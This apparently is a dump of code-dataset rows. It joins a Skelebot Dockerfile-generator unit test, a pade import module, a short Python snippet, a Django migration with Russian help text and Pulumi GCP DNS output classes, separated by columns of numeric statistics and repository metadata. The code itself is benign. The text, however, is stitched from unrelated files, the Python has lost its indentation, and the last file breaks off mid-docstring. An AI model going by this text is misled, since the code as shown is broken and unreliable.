config.dependencies.append("dtable=9.0")
config.components.append(sb.components.kerberos.Kerberos("conf", "tab", "user"))
expectedDockerfile = """
# This Dockerfile was generated by Skelebot
# Editing this file manually is not advised as all changes will be overwritten by Skelebot
FROM skelebot/r-krb
MAINTAINER Mega Man <megaman@cars.com>
WORKDIR /app
RUN ["Rscript", "-e", "install.packages('pyyaml', repo='https://cloud.r-project.org'); library(pyyaml)"]
RUN ["Rscript", "-e", "install.packages('artifactory', repo='https://cloud.r-project.org'); library(artifactory)"]
RUN ["Rscript", "-e", "install.packages('argparse', repo='https://cloud.r-project.org'); library(argparse)"]
RUN ["Rscript", "-e", "install.packages('coverage', repo='https://cloud.r-project.org'); library(coverage)"]
RUN ["Rscript", "-e", "install.packages('pytest', repo='https://cloud.r-project.org'); library(pytest)"]
RUN ["Rscript", "-e", "library(devtools); install_github('github.com/repo'); library(cool-lib)"]
COPY libs/proj libs/proj
RUN ["Rscript", "-e", "install.packages('/app/libs/proj', repos=NULL, type='source'); library(cool-proj)"]
RUN ["Rscript", "-e", "library(devtools); install_version('dtable', version='9.0', repos='http://cran.us.r-project.org'); library(dtable)"]
COPY . /app
RUN rm -rf build/
RUN rm -rf dist/
COPY conf /etc/krb5.conf
COPY tab /krb/auth.keytab
CMD /bin/bash -c \"/./krb/init.sh user && bash build.sh --env local --log info\"\n"""
sb.systems.generators.dockerfile.buildDockerfile(config)
data = None
with open(filePath, "r") as file:
data = file.read()
self.assertTrue(data is not None)
self.assertEqual(data, expectedDockerfile)
@mock.patch('os.path.expanduser')
@mock.patch('os.getcwd')
def test_buildDockerfile_no_command(self, mock_getcwd, mock_expanduser):
folderPath = "{path}/test/files".format(path=self.path)
filePath = "{folder}/Dockerfile".format(folder=folderPath)
mock_expanduser.return_value = "{path}/test/plugins".format(path=self.path)
mock_getcwd.return_value = folderPath
config = sb.systems.generators.yaml.loadConfig()
# No custom docker run command
config.commands = []
config.language = None
expectedDockerfile = """
# This Dockerfile was generated by Skelebot
# Editing this file manually is not advised as all changes will be overwritten by Skelebot
FROM ubuntu:18.04
MAINTAINER Mega Man <megaman@cars.com>
WORKDIR /app
COPY . /app
CMD /bin/bash -c \"bash build.sh --env local --log info\"\n"""
sb.systems.generators.dockerfile.buildDockerfile(config)
data = None
with open(filePath, "r") as file:
data = file.read()
self.assertTrue(data is not None)
self.assertEqual(data, expectedDockerfile)
@mock.patch('os.path.expanduser')
@mock.patch('os.getcwd')
def test_buildDockerfile_append_command(self, mock_getcwd, mock_expanduser):
folderPath = "{path}/test/files".format(path=self.path)
filePath = "{folder}/Dockerfile".format(folder=folderPath)
mock_expanduser.return_value = "{path}/test/plugins".format(path=self.path)
mock_getcwd.return_value = folderPath
config = sb.systems.generators.yaml.loadConfig()
config.language = None
config.components.append(SayDude())
expectedDockerfile = """
# This Dockerfile was generated by Skelebot
# Editing this file manually is not advised as all changes will be overwritten by Skelebot
FROM ubuntu:18.04
MAINTAINER Mega Man <megaman@cars.com>
WORKDIR /app
COPY . /app
RUN rm -rf build/
RUN rm -rf dist/
CMD /bin/bash -c \"bash build.sh --env local --log info && echo Duuuuuude\"\n"""
sb.systems.generators.dockerfile.buildDockerfile(config)
data = None
with open(filePath, "r") as file:
data = file.read()
self.assertTrue(data is not None)
self.assertEqual(data, expectedDockerfile)
@mock.patch('os.path.expanduser')
@mock.patch('os.getcwd')
def test_buildDockerfile_custom(self, mock_getcwd, mock_expanduser):
folderPath = "{path}/test/files".format(path=self.path)
filePath = "{folder}/Dockerfile".format(folder=folderPath)
mock_expanduser.return_value = "{path}/test/plugins".format(path=self.path)
mock_getcwd.return_value = folderPath
config = sb.systems.generators.yaml.loadConfig()
config.baseImage = "whatever:uwant"
expectedDockerfile = """
# This Dockerfile was generated by Skelebot
# Editing this file manually is not advised as all changes will be overwritten by Skelebot
FROM whatever:uwant
MAINTAINER Mega Man <megaman@cars.com>
WORKDIR /app
RUN ["pip", "install", "pyyaml"]
RUN ["pip", "install", "artifactory"]
RUN ["pip", "install", "argparse"]
RUN ["pip", "install", "coverage"]
RUN ["pip", "install", "pytest"]
COPY . /app
RUN rm -rf build/
RUN rm -rf dist/
CMD /bin/bash -c \"bash build.sh --env local --log info\"\n"""
sb.systems.generators.dockerfile.buildDockerfile(config)
data = None
with open(filePath, "r") as file:
data = file.read()
self.assertTrue(data is not None)
self.assertEqual(data, expectedDockerfile)
@mock.patch('os.path.expanduser')
@mock.patch('os.getcwd')
def test_buildDockerfile_R_plus_Python(self, mock_getcwd, mock_expanduser):
folderPath = "{path}/test/files".format(path=self.path)
filePath = "{folder}/Dockerfile".format(folder=folderPath)
mock_expanduser.return_value = "{path}/test/plugins".format(path=self.path)
mock_getcwd.return_value = folderPath
config = sb.systems.generators.yaml.loadConfig()
config.language = "R+Python"
config.dependencies = {
"Python":[
"numpy", "pandas",
"github:github.com/repo", "github:https://github.com/securerepo",
"file:libs/proj",
"dtable>=9.0", "dtable=9.0"
],
"R":[
"data.table", "here",
"github:github.com/repo:cool-lib",
"file:libs/proj:cool-proj",
"dtable=9.0"
]
}
config.components.append(sb.components.kerberos.Kerberos("conf", "tab", "user"))
expectedDockerfile = """
# This Dockerfile was generated by Skelebot
# Editing this file manually is not advised as all changes will be overwritten by Skelebot
FROM skelebot/r-krb
MAINTAINER Mega Man <megaman@cars.com>
WORKDIR /app
RUN ["pip3", "install", "numpy"]
RUN ["pip3", "install", "pandas"]
RUN ["pip3", "install", "git+github.com/repo"]
RUN ["pip3", "install", "git+https://github.com/securerepo"]
COPY libs/proj libs/proj
RUN ["pip3", "install", "/app/libs/proj"]
RUN ["pip3", "install", "dtable>=9.0"]
RUN ["pip3", "install", "dtable==9.0"]
RUN ["Rscript", "-e", "install.packages('data.table', repo='https://cloud.r-project.org'); library(data.table)"]
RUN ["Rscript", "-e", "install.packages('here', repo='https://cloud.r-project.org'); library(here)"]
RUN ["Rscript", "-e", "library(devtools); install_github('github.com/repo'); library(cool-lib)"]
COPY libs/proj libs/proj
RUN ["Rscript", "-e", "install.packages('/app/libs/proj', repos=NULL, type='source'); library(cool-proj)"]
RUN ["Rscript", "-e", "library(devtools); install_version('dtable', version='9.0', repos='http://cran.us.r-project.org'); library(dtable)"]
COPY . /app
RUN rm -rf build/
RUN rm -rf dist/
COPY conf /etc/krb5.conf
COPY tab /krb/auth.keytab
CMD /bin/bash -c "/./krb/init.sh user && bash build.sh --env local --log info\"\n"""
sb.systems.generators.dockerfile.buildDockerfile(config)
data = None
with open(filePath, "r") as file:
data = file.read()
self.assertTrue(data is not None)
self.assertEqual(data, expectedDockerfile)
@mock.patch('os.path.expanduser')
@mock.patch('os.getcwd')
def test_buildDockerfile_timezone(self, mock_getcwd, mock_expanduser):
folderPath = "{path}/test/files".format(path=self.path)
filePath = "{folder}/Dockerfile".format(folder=folderPath)
mock_expanduser.return_value = "{path}/test/plugins".format(path=self.path)
mock_getcwd.return_value = folderPath
config = sb.systems.generators.yaml.loadConfig()
config.language = "R"
config.timezone = "America/Chicago"
config.dependencies.append("github:github.com/repo:cool-lib")
config.dependencies.append("file:libs/proj:cool-proj")
config.dependencies.append("dtable=9.0")
expectedDockerfile = """
# This Dockerfile was generated by Skelebot
# Editing this file manually is not advised as all changes will be overwritten by Skelebot
FROM skelebot/r-base
MAINTAINER Mega Man <megaman@cars.com>
WORKDIR /app
ENV TZ=America/Chicago
RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone
RUN ["Rscript", "-e", "install.packages('pyyaml', repo='https://cloud.r-project.org'); library(pyyaml)"]
RUN ["Rscript", "-e", "install.packages('artifactory', repo='https://cloud.r-project.org'); library(artifactory)"]
RUN ["Rscript", "-e", "install.packages('argparse', repo='https://cloud.r-project.org'); library(argparse)"]
RUN ["Rscript", "-e", "install.packages('coverage', repo='https://cloud.r-project.org'); library(coverage)"]
RUN ["Rscript", "-e", "install.packages('pytest', repo='https://cloud.r-project.org'); library(pytest)"]
RUN ["Rscript", "-e", "library(devtools); install_github('github.com/repo'); library(cool-lib)"]
COPY libs/proj libs/proj
RUN ["Rscript", "-e", "install.packages('/app/libs/proj', repos=NULL, type='source'); library(cool-proj)"]
RUN ["Rscript", "-e", "library(devtools); install_version('dtable', version='9.0', repos='http://cran.us.r-project.org'); library(dtable)"]
COPY . /app
RUN rm -rf build/
RUN rm -rf dist/
CMD /bin/bash -c \"bash build.sh --env local --log info\"\n"""
sb.systems.generators.dockerfile.buildDockerfile(config)
data = None
with open(filePath, "r") as file:
data = file.read()
self.assertTrue(data is not None)
self.assertEqual(data, expectedDockerfile)
if __name__ == '__main__':
unittest.main()
| 40.377698
| 139
| 0.6702
| 2,876
| 22,450
| 5.186022
| 0.07267
| 0.015689
| 0.033993
| 0.031378
| 0.921421
| 0.907275
| 0.898424
| 0.88877
| 0.884747
| 0.884747
| 0
| 0.004588
| 0.174833
| 22,450
| 555
| 140
| 40.45045
| 0.80054
| 0.007706
| 0
| 0.820513
| 0
| 0.07265
| 0.505365
| 0.062946
| 0
| 0
| 0
| 0
| 0.055556
| 1
| 0.032051
| false
| 0
| 0.008547
| 0.002137
| 0.051282
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
21bfd128d847dfb319ee42109bdd19ef2eb473aa
| 242
|
py
|
Python
|
pade/behaviours/highlevel.py
|
bressanmarcos/pade-plus
|
b879a3c543f6c291a8779879efdc8119ce8ed0d5
|
[
"MIT"
] | null | null | null |
pade/behaviours/highlevel.py
|
bressanmarcos/pade-plus
|
b879a3c543f6c291a8779879efdc8119ce8ed0d5
|
[
"MIT"
] | null | null | null |
pade/behaviours/highlevel.py
|
bressanmarcos/pade-plus
|
b879a3c543f6c291a8779879efdc8119ce8ed0d5
|
[
"MIT"
] | null | null | null |
from .session import AgentSession
from .session.exceptions import *
from .session.fipa_contractnet import FipaContractNetProtocol
from .session.fipa_request import FipaRequestProtocol
from .session.fipa_subscribe import FipaSubscribeProtocol
| 40.333333
| 61
| 0.876033
| 26
| 242
| 8.038462
| 0.461538
| 0.263158
| 0.215311
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082645
| 242
| 5
| 62
| 48.4
| 0.941441
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
21d7bd94c2df4a57e1673ec71fe769ab67d145c5
| 231
|
py
|
Python
|
_28_EXERCISE_TEXT_PROCESSING/_6_Replace_Repeating_Chars.py
|
YordanPetrovDS/Python_Fundamentals
|
81163054cd3ac780697eaa43f099cc455f253a0c
|
[
"MIT"
] | null | null | null |
_28_EXERCISE_TEXT_PROCESSING/_6_Replace_Repeating_Chars.py
|
YordanPetrovDS/Python_Fundamentals
|
81163054cd3ac780697eaa43f099cc455f253a0c
|
[
"MIT"
] | null | null | null |
_28_EXERCISE_TEXT_PROCESSING/_6_Replace_Repeating_Chars.py
|
YordanPetrovDS/Python_Fundamentals
|
81163054cd3ac780697eaa43f099cc455f253a0c
|
[
"MIT"
] | null | null | null |
line = input()
# for index, char in enumerate(line):
# if index == 0 or char != line[index - 1]:
# print(char, end="")
[print(char, end="") for index, char in enumerate(line) if index == 0 or char != line[index - 1]]
| 28.875
| 97
| 0.584416
| 36
| 231
| 3.75
| 0.361111
| 0.118519
| 0.177778
| 0.207407
| 0.755556
| 0.755556
| 0.755556
| 0.755556
| 0.755556
| 0.755556
| 0
| 0.022599
| 0.233766
| 231
| 7
| 98
| 33
| 0.740113
| 0.471861
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
df16420cd7463200c150ab8401d682a553906740
| 6,882
|
py
|
Python
|
slavdict/csl_annotations/migrations/0003_auto_20191029_1724.py
|
slavdict/slavdict
|
893886b80de413cb2bb6c0af5adba9c55aa6a7af
|
[
"CC0-1.0"
] | 1
|
2022-01-17T17:26:25.000Z
|
2022-01-17T17:26:25.000Z
|
slavdict/csl_annotations/migrations/0003_auto_20191029_1724.py
|
slavdict/slavdict
|
893886b80de413cb2bb6c0af5adba9c55aa6a7af
|
[
"CC0-1.0"
] | 8
|
2020-02-12T13:26:05.000Z
|
2022-02-10T19:28:07.000Z
|
slavdict/csl_annotations/migrations/0003_auto_20191029_1724.py
|
slavdict/slavdict
|
893886b80de413cb2bb6c0af5adba9c55aa6a7af
|
[
"CC0-1.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.25 on 2019-10-29 17:24
from django.db import migrations, models
import slavdict.csl_annotations.models
class Migration(migrations.Migration):
dependencies = [
('csl_annotations', '0002_auto_20191020_2313'),
]
operations = [
migrations.AlterField(
model_name='annotation',
name='anchor',
field=models.SlugField(blank=True, help_text='\n\n \u042f\u043a\u043e\u0440\u044c, \u0447\u0442\u043e\u0431\u044b \u0441\u043e\u0441\u043b\u0430\u0442\u044c\u0441\u044f \u043d\u0430 \u0442\u0435\u043a\u0443\u0449\u0443\u044e \u0430\u043d\u043d\u043e\u0442\u0430\u0446\u0438\u044e \u0438\u0437 \u0434\u0440\u0443\u0433\u043e\u0439 \u0430\u043d\u043d\u043e\u0442\u0430\u0446\u0438\u0438.<br>\n \u0415\u0441\u043b\u0438 \u0441\u0441\u044b\u043b\u043a\u0430\u0442\u044c\u0441\u044f \u043d\u0430 \u0434\u0430\u043d\u043d\u0443\u044e \u0430\u043d\u043d\u043e\u0442\u0430\u0446\u0438\u044e \u0438\u0437 \u0434\u0440\u0443\u0433\u043e\u0439 \u043d\u0435\u0442 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e\u0441\u0442\u0438,<br>\n \u0442\u043e \u043f\u043e\u043b\u0435 \u043c\u043e\u0436\u043d\u043e \u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0442\u044c \u043f\u0443\u0441\u0442\u044b\u043c.<br>\n <br>\n \u0415\u0441\u043b\u0438 \u044f\u043a\u043e\u0440\u044c \u0430\u043d\u043d\u043e\u0442\u0430\u0446\u0438\u0438 \u043d\u0430 \xab\u0440\u0435\u0441\u0443\u0440\u0441 N\xbb \u0437\u0430\u0434\u0430\u043d \u0442\u0430\u043a <span\n style="color: #070">ludogovsk8</span>, \u0442\u043e \u0441\u043e\u0441\u043b\u0430\u0442\u044c\u0441\u044f<br>\n \u0438\u0437 \u0442\u0435\u043a\u0441\u0442\u0430 \u0434\u0440\u0443\u0433\u043e\u0439 \u0430\u043d\u043d\u043e\u0442\u0430\u0446\u0438\u0438 \u043d\u0430 \u043d\u0435\u0433\u043e \u043c\u043e\u0436\u043d\u043e \u0442\u0430\u043a:\n <span style="color: #070">\u0441\u043c. [\u0440\u0435\u0441\u0443\u0440\u0441 N](#ludogovsk8)</span>.<br>\n\n', max_length=30, null=True, unique=True, verbose_name='\u044f\u043a\u043e\u0440\u044c'),
),
migrations.AlterField(
model_name='annotation',
name='annotation',
field=models.TextField(blank=True, help_text='\n\n \u041e\u0431\u044f\u0437\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u0434\u043b\u044f \u043a\u043d\u0438\u0433 \u0438 \u0441\u0442\u0430\u0442\u0435\u0439, \u0444\u0430\u043a\u0443\u043b\u044c\u0442\u0430\u0442\u0438\u0432\u043d\u043e \u0434\u043b\u044f \u0432\u0438\u0434\u0435\u043e.\n\n\n\n <p style="font-size: xx-small; margin-bottom: 1em">\n \u0414\u043b\u044f \u043a\u0443\u0440\u0441\u0438\u0432\u0430, \u0441\u0441\u044b\u043b\u043e\u043a \u0438 \u0430\u0431\u0437\u0430\u0446\u0435\u0432 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0439\u0442\u0435\n <a target="_blank" href="https://docs.google.com/document/d/1onDgE9wkZSGbXZg5V3GdoPx8gQ4fhXe73E7Sn0qvDY4">\u0440\u0430\u0437\u043c\u0435\u0442\u043a\u0443 Markdown</a>.</p>\n\n', null=True, unique=True, verbose_name='\u0430\u043d\u043d\u043e\u0442\u0430\u0446\u0438\u044f'),
),
migrations.AlterField(
model_name='annotation',
name='bib',
field=slavdict.csl_annotations.models.FixedWidthTextField(blank=True, help_text='\u0414\u043b\u044f \u043a\u043d\u0438\u0433 \u0438 \u0441\u0442\u0430\u0442\u0435\u0439.\n\n <p style="font-size: xx-small; margin-bottom: 1em">\n \u0414\u043b\u044f \u043a\u0443\u0440\u0441\u0438\u0432\u0430, \u0441\u0441\u044b\u043b\u043e\u043a \u0438 \u0430\u0431\u0437\u0430\u0446\u0435\u0432 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0439\u0442\u0435\n <a target="_blank" href="https://docs.google.com/document/d/1onDgE9wkZSGbXZg5V3GdoPx8gQ4fhXe73E7Sn0qvDY4">\u0440\u0430\u0437\u043c\u0435\u0442\u043a\u0443 Markdown</a>.</p>\n\n', max_length=2000, null=True, verbose_name='\u0431\u0438\u0431\u043b\u0438\u043e\u0433\u0440\u0430\u0444\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0441\u0441\u044b\u043b\u043a\u0430'),
),
migrations.AlterField(
model_name='annotation',
name='teaser',
field=models.TextField(blank=True, help_text='\u0414\u043b\u044f \u0432\u0438\u0434\u0435\u043e.\n\n <p style="font-size: xx-small; margin-bottom: 1em">\n \u0414\u043b\u044f \u043a\u0443\u0440\u0441\u0438\u0432\u0430, \u0441\u0441\u044b\u043b\u043e\u043a \u0438 \u0430\u0431\u0437\u0430\u0446\u0435\u0432 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0439\u0442\u0435\n <a target="_blank" href="https://docs.google.com/document/d/1onDgE9wkZSGbXZg5V3GdoPx8gQ4fhXe73E7Sn0qvDY4">\u0440\u0430\u0437\u043c\u0435\u0442\u043a\u0443 Markdown</a>.</p>\n\n', null=True, unique=True, verbose_name='\u0442\u0438\u0437\u0435\u0440'),
),
migrations.AlterField(
model_name='annotation',
name='title',
field=slavdict.csl_annotations.models.FixedWidthTextField(blank=True, help_text='\n\n \u041e\u0431\u044f\u0437\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u0434\u043b\u044f \u0432\u0438\u0434\u0435\u043e, \u0444\u0430\u043a\u0443\u043b\u044c\u0442\u0430\u0442\u0438\u0432\u043d\u043e \u0434\u043b\u044f \u043a\u043d\u0438\u0433 \u0438 \u0441\u0442\u0430\u0442\u0435\u0439.<br>\n \u0420\u0443\u0447\u043d\u043e\u0435 \u0443\u043a\u0430\u0437\u0430\u043d\u0438\u0435 \u0430\u0432\u0442\u043e\u0440\u0441\u0442\u0432\u0430 \u0432 \u044d\u0442\u043e\u043c \u043f\u043e\u043b\u0435 \u043d\u0435 \u043f\u0440\u0438\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u0435\u0442\u0441\u044f, \u0442\u0430\u043a \u043a\u0430\u043a<br>\n \u0430\u0432\u0442\u043e\u0440 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0431\u0443\u0434\u0435\u0442 \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d (\u0435\u0441\u043b\u0438 \u043e\u043d \u0432\u044b\u0434\u0435\u043b\u0435\u043d \u0433\u0430\u043b\u043e\u0447\u043a\u043e\u0439 \u0432 \u043f\u043e\u043b\u0435<br>\n \xab\u0410\u0432\u0442\u043e\u0440\xbb) \u043f\u0440\u0438 \u0432\u044b\u0432\u043e\u0434\u0435 \u0437\u0430\u0433\u043e\u043b\u043e\u0432\u043a\u0430 \u0430\u043d\u043d\u043e\u0442\u0430\u0446\u0438\u0438 \u043d\u0430 \u043f\u043e\u0440\u0442\u0430\u043b\u0435.\n\n\n\n <p style="font-size: xx-small; margin-bottom: 1em">\n \u0414\u043b\u044f \u043a\u0443\u0440\u0441\u0438\u0432\u0430, \u0441\u0441\u044b\u043b\u043e\u043a \u0438 \u0430\u0431\u0437\u0430\u0446\u0435\u0432 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0439\u0442\u0435\n <a target="_blank" href="https://docs.google.com/document/d/1onDgE9wkZSGbXZg5V3GdoPx8gQ4fhXe73E7Sn0qvDY4">\u0440\u0430\u0437\u043c\u0435\u0442\u043a\u0443 Markdown</a>.</p>\n\n', max_length=200, null=True, verbose_name='\u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435'),
),
]
| 163.857143
| 1,926
| 0.744551
| 1,027
| 6,882
| 4.961052
| 0.115871
| 0.035329
| 0.023553
| 0.031403
| 0.6895
| 0.650245
| 0.578803
| 0.544652
| 0.536801
| 0.512267
| 0
| 0.429868
| 0.087329
| 6,882
| 41
| 1,927
| 167.853659
| 0.381309
| 0.010026
| 0
| 0.454545
| 1
| 0.181818
| 0.815859
| 0.571806
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.060606
| 0
| 0.151515
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
df2b48678403775cd7bcfc208f846c0ae8896701
| 39,056
|
py
|
Python
|
sdk/python/pulumi_gcp/dns/outputs.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | 121
|
2018-06-18T19:16:42.000Z
|
2022-03-31T06:06:48.000Z
|
sdk/python/pulumi_gcp/dns/outputs.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | 492
|
2018-06-22T19:41:03.000Z
|
2022-03-31T15:33:53.000Z
|
sdk/python/pulumi_gcp/dns/outputs.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | 43
|
2018-06-19T01:43:13.000Z
|
2022-03-23T22:43:37.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
__all__ = [
'ManagedZoneDnssecConfig',
'ManagedZoneDnssecConfigDefaultKeySpec',
'ManagedZoneForwardingConfig',
'ManagedZoneForwardingConfigTargetNameServer',
'ManagedZonePeeringConfig',
'ManagedZonePeeringConfigTargetNetwork',
'ManagedZonePrivateVisibilityConfig',
'ManagedZonePrivateVisibilityConfigNetwork',
'ManagedZoneServiceDirectoryConfig',
'ManagedZoneServiceDirectoryConfigNamespace',
'PolicyAlternativeNameServerConfig',
'PolicyAlternativeNameServerConfigTargetNameServer',
'PolicyNetwork',
'GetKeysKeySigningKeyResult',
'GetKeysKeySigningKeyDigestResult',
'GetKeysZoneSigningKeyResult',
'GetKeysZoneSigningKeyDigestResult',
]
@pulumi.output_type
class ManagedZoneDnssecConfig(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "defaultKeySpecs":
suggest = "default_key_specs"
elif key == "nonExistence":
suggest = "non_existence"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in ManagedZoneDnssecConfig. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
ManagedZoneDnssecConfig.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
ManagedZoneDnssecConfig.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
default_key_specs: Optional[Sequence['outputs.ManagedZoneDnssecConfigDefaultKeySpec']] = None,
kind: Optional[str] = None,
non_existence: Optional[str] = None,
state: Optional[str] = None):
"""
:param Sequence['ManagedZoneDnssecConfigDefaultKeySpecArgs'] default_key_specs: Specifies parameters that will be used for generating initial DnsKeys
for this ManagedZone. If you provide a spec for keySigning or zoneSigning,
you must also provide one for the other.
default_key_specs can only be updated when the state is `off`.
Structure is documented below.
:param str kind: Identifies what kind of resource this is
:param str non_existence: Specifies the mechanism used to provide authenticated denial-of-existence responses.
non_existence can only be updated when the state is `off`.
Possible values are `nsec` and `nsec3`.
:param str state: Specifies whether DNSSEC is enabled, and what mode it is in
Possible values are `off`, `on`, and `transfer`.
"""
if default_key_specs is not None:
pulumi.set(__self__, "default_key_specs", default_key_specs)
if kind is not None:
pulumi.set(__self__, "kind", kind)
if non_existence is not None:
pulumi.set(__self__, "non_existence", non_existence)
if state is not None:
pulumi.set(__self__, "state", state)
@property
@pulumi.getter(name="defaultKeySpecs")
def default_key_specs(self) -> Optional[Sequence['outputs.ManagedZoneDnssecConfigDefaultKeySpec']]:
"""
Specifies parameters that will be used for generating initial DnsKeys
for this ManagedZone. If you provide a spec for keySigning or zoneSigning,
you must also provide one for the other.
default_key_specs can only be updated when the state is `off`.
Structure is documented below.
"""
return pulumi.get(self, "default_key_specs")
@property
@pulumi.getter
def kind(self) -> Optional[str]:
"""
Identifies what kind of resource this is
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter(name="nonExistence")
def non_existence(self) -> Optional[str]:
"""
Specifies the mechanism used to provide authenticated denial-of-existence responses.
non_existence can only be updated when the state is `off`.
Possible values are `nsec` and `nsec3`.
"""
return pulumi.get(self, "non_existence")
@property
@pulumi.getter
def state(self) -> Optional[str]:
"""
Specifies whether DNSSEC is enabled, and what mode it is in
Possible values are `off`, `on`, and `transfer`.
"""
return pulumi.get(self, "state")
@pulumi.output_type
class ManagedZoneDnssecConfigDefaultKeySpec(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "keyLength":
suggest = "key_length"
elif key == "keyType":
suggest = "key_type"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in ManagedZoneDnssecConfigDefaultKeySpec. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
ManagedZoneDnssecConfigDefaultKeySpec.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
ManagedZoneDnssecConfigDefaultKeySpec.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
algorithm: Optional[str] = None,
key_length: Optional[int] = None,
key_type: Optional[str] = None,
kind: Optional[str] = None):
"""
:param str algorithm: String mnemonic specifying the DNSSEC algorithm of this key
Possible values are `ecdsap256sha256`, `ecdsap384sha384`, `rsasha1`, `rsasha256`, and `rsasha512`.
:param int key_length: Length of the keys in bits
:param str key_type: Specifies whether this is a key signing key (KSK) or a zone
signing key (ZSK). Key signing keys have the Secure Entry
Point flag set and, when active, will only be used to sign
resource record sets of type DNSKEY. Zone signing keys do
not have the Secure Entry Point flag set and will be used
to sign all other types of resource record sets.
Possible values are `keySigning` and `zoneSigning`.
:param str kind: Identifies what kind of resource this is
"""
if algorithm is not None:
pulumi.set(__self__, "algorithm", algorithm)
if key_length is not None:
pulumi.set(__self__, "key_length", key_length)
if key_type is not None:
pulumi.set(__self__, "key_type", key_type)
if kind is not None:
pulumi.set(__self__, "kind", kind)
@property
@pulumi.getter
def algorithm(self) -> Optional[str]:
"""
String mnemonic specifying the DNSSEC algorithm of this key
Possible values are `ecdsap256sha256`, `ecdsap384sha384`, `rsasha1`, `rsasha256`, and `rsasha512`.
"""
return pulumi.get(self, "algorithm")
@property
@pulumi.getter(name="keyLength")
def key_length(self) -> Optional[int]:
"""
Length of the keys in bits
"""
return pulumi.get(self, "key_length")
@property
@pulumi.getter(name="keyType")
def key_type(self) -> Optional[str]:
"""
Specifies whether this is a key signing key (KSK) or a zone
signing key (ZSK). Key signing keys have the Secure Entry
Point flag set and, when active, will only be used to sign
resource record sets of type DNSKEY. Zone signing keys do
not have the Secure Entry Point flag set and will be used
to sign all other types of resource record sets.
Possible values are `keySigning` and `zoneSigning`.
"""
return pulumi.get(self, "key_type")
@property
@pulumi.getter
def kind(self) -> Optional[str]:
"""
Identifies what kind of resource this is
"""
return pulumi.get(self, "kind")
@pulumi.output_type
class ManagedZoneForwardingConfig(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "targetNameServers":
suggest = "target_name_servers"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in ManagedZoneForwardingConfig. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
ManagedZoneForwardingConfig.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
ManagedZoneForwardingConfig.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
target_name_servers: Sequence['outputs.ManagedZoneForwardingConfigTargetNameServer']):
"""
